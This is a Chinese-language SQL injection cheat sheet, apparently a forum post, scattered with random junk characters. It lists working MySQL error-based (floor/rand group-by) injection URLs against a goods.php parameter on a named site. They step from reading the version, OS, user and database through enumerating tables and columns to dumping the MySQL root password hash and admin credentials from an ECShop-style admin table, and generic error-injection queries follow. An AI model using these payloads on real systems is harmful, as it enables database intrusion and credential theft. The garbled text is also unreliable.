判断版本号
; M, R$ P. `; P! N! {* Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& d3 g3 i: k# `! m3 [' D: L
@( S5 `9 v' E$ h判断系统
% D7 m, k1 ~$ W3 d$ W3 w% g; ? ]
' ^0 ]5 Q. A) {7 I& @5 k' ^+ ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% y, U1 _* L! h- [8 u6 v& ?
3 v7 s* ^" h$ w7 e8 _0 a
9 x! V" g- B8 b% a7 n
- y2 e' O# Y: Z3 O; f$ v- o) Y
当前 user()# G+ R5 ] R5 [5 g; _
& \! k1 D3 u0 ^! Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 \, ]1 X8 |; {- R& o5 p1 U
! o" c, O6 Y5 ?( G' r+ ~6 l. `4 W5 O
8 h- e% Q+ ~7 s. q% N# a. E, H
当前 database()* V2 y; |1 A& B6 H8 V1 [ j
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" |" V; |+ f' B( k) ^) E
0 [7 Q7 s5 l+ `: X2 @5 y9 g; h6 C9 D2 q7 ^
7 x a7 o4 A5 k3 v! ^% C8 Z" T
s5 G. M4 M. U. t( q: n Oroot hash
% |) t% d8 i& O8 G( r8 K2 r! e' J
' G5 N6 n" a- ~, _( ]7 y2 ^http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 ^9 o b1 w! x( ~- ?7 G3 E% {4 T6 m- K; U. X& r; h
' E$ N6 `4 I# f: p/ [" S
/ ^( x! q( F$ \2 _0 d当前 数据库表名
: v( j" z8 C! ]/ w( _
, G; s; _: n8 ^, A/ l' r$ {http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, K! _& k+ B4 `+ V; D: J& N$ B
: F' K9 e0 z8 z! ^
+ {8 |" |1 m w. O) B( A# @
E/ @+ A0 R- J9 M8 U3 K
当前 数据库 user_name 字段* ~8 \3 B7 m0 Y* Y9 J* G3 [
* }2 Q: R: U9 i4 ?, \! {4 O5 y5 H1 Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- ]2 T/ s: m! S1 W/ p( o0 b
4 d) b" b0 z5 {; h
当前 数据库 字段 password
# e7 i/ r4 d/ W0 L/ u7 U8 L: Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 L/ \% A3 w; h
& X7 l4 q& ?9 }/ A( i2 f8 t/ _0 a
+ J: ^; B, N' y9 O! {4 ]8 m, P& _" c- A
获得 admin passwd(md5) L" D4 P1 l" s& o3 ?/ s- K
( |- [0 ~! m* I3 X' u5 z4 e @$ V. T2 A
9 B' B7 b" z8 o- u, v. L% d/ t6 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 I' [- J. b \8 e% s0 p6 ?
$ y- F/ v c1 Y报错注射, ]! i6 t6 x: ?* ~
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
4 U* Y/ @8 ~) J- i7 h8 T6 v6 ?' F2 j0 V, U
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)/ ~' J; Z9 b/ X
. m" b8 d* s7 ]1 _2 fand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |